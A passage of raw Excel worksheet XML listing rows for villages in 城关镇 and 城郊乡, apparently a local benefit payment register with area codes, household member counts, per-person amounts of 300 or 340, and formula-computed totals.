      </c>
      <c r="D1195" s="17" t="s">
        <v>3180</v>
      </c>
      <c r="E1195" s="29" t="s">
        <v>3181</v>
      </c>
      <c r="F1195" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G1195" s="32">
        <v>2</v>
      </c>
      <c r="H1195" s="32">
        <v>300</v>
      </c>
      <c r="I1195" s="3">
        <v>600</v>
      </c>
      <c r="J1195" s="33" t="s">
        <v>3182</v>
      </c>
      <c r="K1195" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1196" s="3" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1196" s="13" t="s">
        <v>3183</v>
      </c>
      <c r="B1196" s="14" t="str">
        <f>B1195</f>
        <v>城关镇</v>
      </c>
      <c r="C1196" s="17" t="str">
        <f>C1195</f>
        <v>北外村</v>
      </c>
      <c r="D1196" s="17" t="s">
        <v>3184</v>
      </c>
      <c r="E1196" s="17" t="s">
        <v>3185</v>
      </c>
      <c r="F1196" s="17" t="str">
        <f>F1195</f>
        <v>4113210102</v>
      </c>
      <c r="G1196" s="14"/>
      <c r="H1196" s="14"/>
      <c r="I1196" s="34"/>
      <c r="J1196" s="32"/>
      <c r="K1196" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1197" s="3" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1197" s="13" t="s">
        <v>3186</v>
      </c>
      <c r="B1197" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1197" s="17" t="s">
        <v>3187</v>
      </c>
      <c r="D1197" s="17" t="s">
        <v>3188</v>
      </c>
      <c r="E1197" s="29" t="s">
        <v>239</v>
      </c>
      <c r="F1197" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1197" s="14">
        <v>1</v>
      </c>
      <c r="H1197" s="14">
        <v>340</v>
      </c>
      <c r="I1197" s="14">
        <f t="shared" ref="I1197:I1202" si="60">H1197*G1197</f>
        <v>340</v>
      </c>
      <c r="J1197" s="32" t="s">
        <v>3182</v>
      </c>
      <c r="K1197" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1198" s="3" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1198" s="13" t="s">
        <v>3189</v>
      </c>
      <c r="B1198" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1198" s="17" t="s">
        <v>3187</v>
      </c>
      <c r="D1198" s="17" t="s">
        <v>3190</v>
      </c>
      <c r="E1198" s="29" t="s">
        <v>779</v>
      </c>
      <c r="F1198" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1198" s="14">
        <v>1</v>
      </c>
      <c r="H1198" s="14">
        <v>340</v>
      </c>
      <c r="I1198" s="14">
        <f t="shared" si="60"/>
        <v>340</v>
      </c>
      <c r="J1198" s="32" t="s">
        <v>3182</v>
      </c>
      <c r="K1198" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1199" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1199" s="13" t="s">
        <v>3191</v>
      </c>
      <c r="B1199" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1199" s="17" t="s">
        <v>507</v>
      </c>
      <c r="D1199" s="17" t="s">
        <v>3192</v>
      </c>
      <c r="E1199" s="29" t="s">
        <v>3193</v>
      </c>
      <c r="F1199" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1199" s="14">
        <v>1</v>
      </c>
      <c r="H1199" s="14">
        <v>340</v>
      </c>
      <c r="I1199" s="14">
        <f t="shared" si="60"/>
        <v>340</v>
      </c>
      <c r="J1199" s="35" t="s">
        <v>3182</v>
      </c>
      <c r="K1199" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1200" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A1200" s="13" t="s">
        <v>3194</v>
      </c>
      <c r="B1200" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1200" s="17" t="s">
        <v>507</v>
      </c>
      <c r="D1200" s="17" t="s">
        <v>3195</v>
      </c>
      <c r="E1200" s="29" t="s">
        <v>236</v>
      </c>
      <c r="F1200" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1200" s="14">
        <v>1</v>
      </c>
      <c r="H1200" s="14">
        <v>340</v>
      </c>
      <c r="I1200" s="14">
        <f t="shared" si="60"/>
        <v>340</v>
      </c>
      <c r="J1200" s="35" t="s">
        <v>3182</v>
      </c>
      <c r="K1200" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1201" ht="23" customHeight="1" spans="1:11">
      <c r="A1201" s="13" t="s">
        <v>3196</v>
      </c>
      <c r="B1201" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1201" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1201" s="14" t="s">
        <v>3197</v>
      </c>
      <c r="E1201" s="14" t="s">
        <v>3198</v>
      </c>
      <c r="F1201" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1201" s="14">
        <v>1</v>
      </c>
      <c r="H1201" s="14">
        <v>340</v>
      </c>
      <c r="I1201" s="14">
        <f t="shared" si="60"/>
        <v>340</v>
      </c>
      <c r="J1201" s="24">
        <v>45108</v>
      </c>
      <c r="K1201" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1202" ht="23" customHeight="1" spans="1:11">
      <c r="A1202" s="13" t="s">
        <v>3199</v>
      </c>
      <c r="B1202" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1202" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1202" s="14" t="s">
        <v>3201</v>
      </c>
      <c r="E1202" s="14" t="s">
        <v>3202</v>
      </c>
      <c r="F1202" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1202" s="14">
        <v>2</v>
      </c>
      <c r="H1202" s="14">
        <v>300</v>
      </c>
      <c r="I1202" s="14">
        <f t="shared" si="60"/>
        <v>600</v>
      </c>
      <c r="J1202" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1202" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1203" ht="23" customHeight="1" spans="1:11">
      <c r="A1203" s="13" t="s">
        <v>3204</v>
      </c>
      <c r="B1203" s="14" t="str">
        <f>B1202</f>
        <v>城郊乡</v>
      </c>
      <c r="C1203" s="14" t="str">
        <f>C1202</f>
        <v>城郊乡</v>
      </c>
      <c r="D1203" s="13" t="s">
        <v>3205</v>
      </c>
      <c r="E1203" s="13" t="s">
        <v>2299</v>
      </c>
      <c r="F1203" s="14" t="str">
        <f>F1202</f>
        <v>4113210299</v>
      </c>
      <c r="G1203" s="14"/>
      <c r="H1203" s="14"/>
      <c r="I1203" s="14"/>
      <c r="J1203" s="14"/>
      <c r="K1203" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1204" ht="23" customHeight="1" spans="1:11">
      <c r="A1204" s="13" t="s">
        <v>3206</v>
      </c>
      <c r="B1204" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1204" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1204" s="14" t="s">
        <v>3207</v>
      </c>
      <c r="E1204" s="14" t="s">
        <v>3208</v>
      </c>
      <c r="F1204" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1204" s="14">
        <v>1</v>
      </c>
      <c r="H1204" s="14">
        <v>340</v>
      </c>
      <c r="I1204" s="14">
        <f>H1204*G1204</f>
        <v>340</v>
      </c>
      <c r="J1204" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1204" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1205" ht="23" customHeight="1" spans="1:11">
      <c r="A1205" s="13" t="s">
        <v>3209</v>
      </c>
      <c r="B1205" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1205" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1205" s="14" t="s">
        <v>3210</v>
      </c>
      <c r="E1205" s="14" t="s">
        <v>3211</v>
      </c>
      <c r="F1205" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1205" s="14">
        <v>1</v>
      </c>
      <c r="H1205" s="14">
        <v>340</v>
      </c>
      <c r="I1205" s="14">
        <f>H1205*G1205</f>
        <v>340</v>
      </c>
      <c r="J1205" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1205" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1206" ht="23" customHeight="1" spans="1:11">
      <c r="A1206" s="13" t="s">
        <v>3212</v>
      </c>
      <c r="B1206" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1206" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1206" s="14" t="s">
        <v>3213</v>
      </c>
      <c r="E1206" s="14" t="s">
        <v>3214</v>
      </c>
      <c r="F1206" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1206" s="14">
        <v>2</v>
      </c>
      <c r="H1206" s="14">
        <v>300</v>
      </c>
      <c r="I1206" s="14">
        <f>H1206*G1206</f>
        <v>600</v>
      </c>
      <c r="J1206" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1206" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1207" ht="23" customHeight="1" spans="1:11">
      <c r="A1207" s="13" t="s">
        <v>3215</v>
      </c>
      <c r="B1207" s="14" t="str">
        <f>B1206</f>
        <v>城郊乡</v>
      </c>
      <c r="C1207" s="14" t="str">
        <f>C1206</f>
        <v>城郊乡</v>
      </c>
      <c r="D1207" s="13" t="s">
        <v>3216</v>
      </c>
      <c r="E1207" s="20" t="s">
        <v>3217</v>
      </c>
      <c r="F1207" s="14" t="str">
        <f>F1206</f>
        <v>4113210299</v>
      </c>
      <c r="G1207" s="14"/>
      <c r="H1207" s="14"/>
      <c r="I1207" s="14"/>
      <c r="J1207" s="14"/>
      <c r="K1207" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1208" ht="23" customHeight="1" spans="1:11">
      <c r="A1208" s="13" t="s">
        <v>3218</v>
      </c>
      <c r="B1208" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1208" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1208" s="14" t="s">
        <v>3219</v>
      </c>
      <c r="E1208" s="14" t="s">
        <v>3220</v>
      </c>
      <c r="F1208" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1208" s="14">
        <v>1</v>
      </c>
      <c r="H1208" s="14">
        <v>340</v>
      </c>
      <c r="I1208" s="14">
        <f t="shared" ref="I1208:I1215" si="61">H1208*G1208</f>
        <v>340</v>
      </c>
      <c r="J1208" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1208" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1209" ht="23" customHeight="1" spans="1:11">
      <c r="A1209" s="13" t="s">
        <v>3221</v>
      </c>
      <c r="B1209" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1209" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1209" s="14" t="s">
        <v>3222</v>
      </c>
      <c r="E1209" s="14" t="s">
        <v>3223</v>
      </c>
      <c r="F1209" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1209" s="14">
        <v>1</v>
      </c>
      <c r="H1209" s="14">
        <v>340</v>
      </c>
      <c r="I1209" s="14">
        <f t="shared" si="61"/>
        <v>340</v>
      </c>
      <c r="J1209" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1209" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1210" ht="23" customHeight="1" spans="1:11">
      <c r="A1210" s="13" t="s">
        <v>3224</v>
      </c>
      <c r="B1210" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1210" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1210" s="14" t="s">
        <v>3225</v>
      </c>
      <c r="E1210" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F1210" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1210" s="14">
        <v>1</v>
      </c>
      <c r="H1210" s="14">
        <v>340</v>
      </c>
      <c r="I1210" s="14">
        <f t="shared" si="61"/>
        <v>340</v>
      </c>
      <c r="J1210" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1210" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1211" ht="23" customHeight="1" spans="1:11">
      <c r="A1211" s="13" t="s">
        <v>3226</v>
      </c>
      <c r="B1211" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1211" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1211" s="14" t="s">
        <v>3227</v>
      </c>
      <c r="E1211" s="14" t="s">
        <v>3228</v>
      </c>
      <c r="F1211" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1211" s="14">
        <v>1</v>
      </c>
      <c r="H1211" s="14">
        <v>340</v>
      </c>
      <c r="I1211" s="14">
        <f t="shared" si="61"/>
        <v>340</v>
      </c>
      <c r="J1211" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1211" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1212" ht="23" customHeight="1" spans="1:11">
      <c r="A1212" s="13" t="s">
        <v>3229</v>
      </c>
      <c r="B1212" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1212" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1212" s="14" t="s">
        <v>3230</v>
      </c>
      <c r="E1212" s="14" t="s">
        <v>3231</v>
      </c>
      <c r="F1212" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1212" s="14">
        <v>1</v>
      </c>
      <c r="H1212" s="14">
        <v>340</v>
      </c>
      <c r="I1212" s="14">
        <f t="shared" si="61"/>
        <v>340</v>
      </c>
      <c r="J1212" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1212" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1213" ht="23" customHeight="1" spans="1:11">
      <c r="A1213" s="13" t="s">
        <v>3232</v>
      </c>
      <c r="B1213" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1213" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1213" s="14" t="s">
        <v>1104</v>
      </c>
      <c r="E1213" s="14" t="s">
        <v>3158</v>
      </c>
      <c r="F1213" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1213" s="14">
        <v>1</v>
      </c>
      <c r="H1213" s="14">
        <v>340</v>
      </c>
      <c r="I1213" s="14">
        <f t="shared" si="61"/>
        <v>340</v>
      </c>
      <c r="J1213" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1213" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1214" ht="23" customHeight="1" spans="1:11">
      <c r="A1214" s="13" t="s">
        <v>3233</v>
      </c>
      <c r="B1214" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1214" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1214" s="14" t="s">
        <v>3234</v>
      </c>
      <c r="E1214" s="14" t="s">
        <v>3235</v>
      </c>
      <c r="F1214" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1214" s="14">
        <v>1</v>
      </c>
      <c r="H1214" s="14">
        <v>340</v>
      </c>
      <c r="I1214" s="14">
        <f t="shared" si="61"/>
        <v>340</v>
      </c>
      <c r="J1214" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1214" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1215" ht="23" customHeight="1" spans="1:11">
      <c r="A1215" s="13" t="s">
        <v>3236</v>
      </c>
      <c r="B1215" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1215" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1215" s="14" t="s">
        <v>3237</v>
      </c>
      <c r="E1215" s="14" t="s">
        <v>3238</v>
      </c>
      <c r="F1215" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1215" s="14">
        <v>2</v>
      </c>
      <c r="H1215" s="14">
        <v>300</v>
      </c>
      <c r="I1215" s="14">
        <f t="shared" si="61"/>
        <v>600</v>
      </c>
      <c r="J1215" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1215" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1216" ht="23" customHeight="1" spans="1:11">
      <c r="A1216" s="13" t="s">
        <v>3239</v>
      </c>
      <c r="B1216" s="14" t="str">
        <f>B1215</f>
        <v>城郊乡</v>
      </c>
      <c r="C1216" s="14" t="str">
        <f>C1215</f>
        <v>城郊乡</v>
      </c>
      <c r="D1216" s="13" t="s">
        <v>3240</v>
      </c>
      <c r="E1216" s="13" t="s">
        <v>419</v>
      </c>
      <c r="F1216" s="14" t="str">
        <f>F1215</f>
        <v>4113210299</v>
      </c>
      <c r="G1216" s="14"/>
      <c r="H1216" s="14"/>
      <c r="I1216" s="14"/>
      <c r="J1216" s="14"/>
      <c r="K1216" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1217" ht="23" customHeight="1" spans="1:11">
      <c r="A1217" s="13" t="s">
        <v>3241</v>
      </c>
      <c r="B1217" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1217" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1217" s="14" t="s">
        <v>3242</v>
      </c>
      <c r="E1217" s="14" t="s">
        <v>3243</v>
      </c>
      <c r="F1217" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1217" s="14">
        <v>1</v>
      </c>
      <c r="H1217" s="14">
        <v>340</v>
      </c>
      <c r="I1217" s="14">
        <f>H1217*G1217</f>
        <v>340</v>
      </c>
      <c r="J1217" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1217" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1218" ht="23" customHeight="1" spans="1:11">
      <c r="A1218" s="13" t="s">
        <v>3244</v>
      </c>
      <c r="B1218" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1218" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1218" s="14" t="s">
        <v>3245</v>
      </c>
      <c r="E1218" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F1218" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1218" s="14">
        <v>1</v>
      </c>
      <c r="H1218" s="14">
        <v>340</v>
      </c>
      <c r="I1218" s="14">
        <f>H1218*G1218</f>
        <v>340</v>
      </c>
      <c r="J1218" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1218" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1219" ht="23" customHeight="1" spans="1:11">
      <c r="A1219" s="13" t="s">
        <v>3246</v>
      </c>
      <c r="B1219" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1219" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1219" s="14" t="s">
        <v>3247</v>
      </c>
      <c r="E1219" s="14" t="s">
        <v>3248</v>
      </c>
      <c r="F1219" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1219" s="14">
        <v>1</v>
      </c>
      <c r="H1219" s="14">
        <v>340</v>
      </c>
      <c r="I1219" s="14">
        <f>H1219*G1219</f>
        <v>340</v>
      </c>
      <c r="J1219" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1219" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1220" ht="23" customHeight="1" spans="1:11">
      <c r="A1220" s="13" t="s">
        <v>3249</v>
      </c>
      <c r="B1220" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1220" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1220" s="14" t="s">
        <v>3250</v>
      </c>
      <c r="E1220" s="14" t="s">
        <v>2804</v>
      </c>
      <c r="F1220" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1220" s="14">
        <v>1</v>
      </c>
      <c r="H1220" s="14">
        <v>340</v>
      </c>
      <c r="I1220" s="14">
        <f>H1220*G1220</f>
        <v>340</v>
      </c>
      <c r="J1220" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1220" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1221" ht="23" customHeight="1" spans="1:11">
      <c r="A1221" s="13" t="s">
        <v>3251</v>
      </c>
      <c r="B1221" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1221" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1221" s="14" t="s">
        <v>3252</v>
      </c>
      <c r="E1221" s="14" t="s">
        <v>3253</v>
      </c>
      <c r="F1221" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1221" s="14">
        <v>2</v>
      </c>
      <c r="H1221" s="14">
        <v>300</v>
      </c>
      <c r="I1221" s="14">
        <f>H1221*G1221</f>
        <v>600</v>
      </c>
      <c r="J1221" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1221" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1222" ht="23" customHeight="1" spans="1:11">
      <c r="A1222" s="13" t="s">
        <v>3254</v>
      </c>
      <c r="B1222" s="14" t="str">
        <f>B1221</f>
        <v>城郊乡</v>
      </c>
      <c r="C1222" s="14" t="str">
        <f>C1221</f>
        <v>城郊乡</v>
      </c>
      <c r="D1222" s="13" t="s">
        <v>3255</v>
      </c>
      <c r="E1222" s="20" t="s">
        <v>3256</v>
      </c>
      <c r="F1222" s="14" t="str">
        <f>F1221</f>
        <v>4113210299</v>
      </c>
      <c r="G1222" s="14"/>
      <c r="H1222" s="14"/>
      <c r="I1222" s="14"/>
      <c r="J1222" s="14"/>
      <c r="K1222" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1223" ht="23" customHeight="1" spans="1:11">
      <c r="A1223" s="13" t="s">
        <v>3257</v>
      </c>
      <c r="B1223" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1223" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1223" s="14" t="s">
        <v>3258</v>
      </c>
      <c r="E1223" s="14" t="s">
        <v>3259</v>
      </c>
      <c r="F1223" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1223" s="14">
        <v>1</v>
      </c>
      <c r="H1223" s="14">
        <v>340</v>
      </c>
      <c r="I1223" s="14">
        <f>H1223*G1223</f>
        <v>340</v>
      </c>
      <c r="J1223" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1223" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1224" ht="23" customHeight="1" spans="1:11">
      <c r="A1224" s="13" t="s">
        <v>3260</v>
      </c>
      <c r="B1224" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1224" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1224" s="14" t="s">
        <v>3261</v>
      </c>
      <c r="E1224" s="14" t="s">
        <v>360</v>
      </c>
      <c r="F1224" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1224" s="14">
        <v>1</v>
      </c>
      <c r="H1224" s="14">
        <v>340</v>
      </c>
      <c r="I1224" s="14">
        <f>H1224*G1224</f>
        <v>340</v>
      </c>
      <c r="J1224" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1224" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1225" ht="23" customHeight="1" spans="1:11">
      <c r="A1225" s="13" t="s">
        <v>3262</v>
      </c>
      <c r="B1225" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1225" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1225" s="14" t="s">
        <v>3263</v>
      </c>
      <c r="E1225" s="14" t="s">
        <v>3264</v>
      </c>
      <c r="F1225" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1225" s="14">
        <v>1</v>
      </c>
      <c r="H1225" s="14">
        <v>340</v>
      </c>
      <c r="I1225" s="14">
        <f>H1225*G1225</f>
        <v>340</v>
      </c>
      <c r="J1225" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1225" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1226" ht="23" customHeight="1" spans="1:11">
      <c r="A1226" s="13" t="s">
        <v>3265</v>
      </c>
      <c r="B1226" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1226" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="D1226" s="14" t="s">
        <v>3266</v>
      </c>
      <c r="E1226" s="14" t="s">
        <v>3158</v>
      </c>
      <c r="F1226" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1226" s="14">
        <v>2</v>
      </c>
      <c r="H1226" s="14">
        <v>300</v>
      </c>
      <c r="I1226" s="14">
        <f>H1226*G1226</f>
        <v>600</v>
      </c>
      <c r="J1226" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1226" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1227" ht="23" customHeight="1" spans="1:11">
      <c r="A1227" s="13" t="s">
        <v>3267</v>
      </c>
      <c r="B1227" s="14" t="str">
        <f>B1226</f>
        <v>城郊乡</v>
      </c>
      <c r="C1227" s="14" t="str">
        <f>C1226</f>
        <v>城郊乡</v>
      </c>
      <c r="D1227" s="13" t="s">
        <v>3268</v>
      </c>
      <c r="E1227" s="13" t="s">
        <v>3269</v>
      </c>
      <c r="F1227" s="14" t="str">
        <f>F1226</f>
        <v>4113210299</v>
      </c>
      <c r="G1227" s="14"/>
      <c r="H1227" s="14"/>
      <c r="I1227" s="14"/>
      <c r="J1227" s="14"/>
      <c r="K1227" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1228" ht="23" customHeight="1" spans="1:11">
      <c r="A1228" s="13" t="s">
        <v>3270</v>
      </c>
      <c r="B1228" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1228" s="14" t="s">
        <v>3271</v>
      </c>
      <c r="D1228" s="14" t="s">
        <v>3272</v>
      </c>
      <c r="E1228" s="14" t="s">
        <v>334</v>
      </c>
      <c r="F1228" s="14" t="s">
        <v>3273</v>
      </c>
      <c r="G1228" s="14">
        <v>1</v>
      </c>
      <c r="H1228" s="14">
        <v>340</v>
      </c>
      <c r="I1228" s="14">
        <f t="shared" ref="I1228:I1233" si="62">H1228*G1228</f>
        <v>340</v>
      </c>
      <c r="J1228" s="14">
        <v>45139</v>
      </c>
      <c r="K1228" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1229" ht="23" customHeight="1" spans="1:11">
      <c r="A1229" s="13" t="s">
        <v>3274</v>
      </c>
      <c r="B1229" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1229" s="14" t="s">
        <v>3275</v>
      </c>
      <c r="D1229" s="14" t="s">
        <v>3276</v>
      </c>
      <c r="E1229" s="14" t="s">
        <v>3277</v>
      </c>
      <c r="F1229" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1229" s="14">
        <v>1</v>
      </c>
      <c r="H1229" s="14">
        <v>340</v>
      </c>
      <c r="I1229" s="14">
        <f t="shared" si="62"/>
        <v>340</v>
      </c>
      <c r="J1229" s="24">
        <v>45108</v>
      </c>
      <c r="K1229" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1230" ht="23" customHeight="1" spans="1:11">
      <c r="A1230" s="13" t="s">
        <v>3278</v>
      </c>
      <c r="B1230" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1230" s="14" t="s">
        <v>3275</v>
      </c>
      <c r="D1230" s="14" t="s">
        <v>3279</v>
      </c>
      <c r="E1230" s="14" t="s">
        <v>3280</v>
      </c>
      <c r="F1230" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1230" s="14">
        <v>1</v>
      </c>
      <c r="H1230" s="14">
        <v>340</v>
      </c>
      <c r="I1230" s="14">
        <f t="shared" si="62"/>
        <v>340</v>
      </c>
      <c r="J1230" s="24">
        <v>45108</v>
      </c>
      <c r="K1230" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1231" ht="23" customHeight="1" spans="1:11">
      <c r="A1231" s="13" t="s">
        <v>3281</v>
      </c>
      <c r="B1231" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1231" s="14" t="s">
        <v>3282</v>
      </c>
      <c r="D1231" s="14" t="s">
        <v>3283</v>
      </c>
      <c r="E1231" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F1231" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1231" s="14">
        <v>1</v>
      </c>
      <c r="H1231" s="14">
        <v>340</v>
      </c>
      <c r="I1231" s="14">
        <f t="shared" si="62"/>
        <v>340</v>
      </c>
      <c r="J1231" s="14">
        <v>45231</v>
      </c>
      <c r="K1231" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1232" ht="23" customHeight="1" spans="1:11">
      <c r="A1232" s="13" t="s">
        <v>3284</v>
      </c>
      <c r="B1232" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1232" s="14" t="s">
        <v>3285</v>
      </c>
      <c r="D1232" s="14" t="s">
        <v>3286</v>
      </c>
      <c r="E1232" s="14" t="s">
        <v>1486</v>
      </c>
      <c r="F1232" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1232" s="14">
        <v>1</v>
      </c>
      <c r="H1232" s="14">
        <v>340</v>
      </c>
      <c r="I1232" s="14">
        <f t="shared" si="62"/>
        <v>340</v>
      </c>
      <c r="J1232" s="14">
        <v>45231</v>
      </c>
      <c r="K1232" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1233" ht="23" customHeight="1" spans="1:11">
      <c r="A1233" s="13" t="s">
        <v>3287</v>
      </c>
      <c r="B1233" s="14" t="s">
        <v>3200</v>
      </c>
      <c r="C1233" s="14" t="s">
        <v>3275</v>
      </c>
      <c r="D1233" s="14" t="s">
        <v>3288</v>
      </c>
      <c r="E1233" s="14" t="s">
        <v>3289</v>
      </c>
      <c r="F1233" s="14" t="s">
        <v>3203</v>
      </c>
      <c r="G1233" s="14">
        <v>3</v>
      </c>
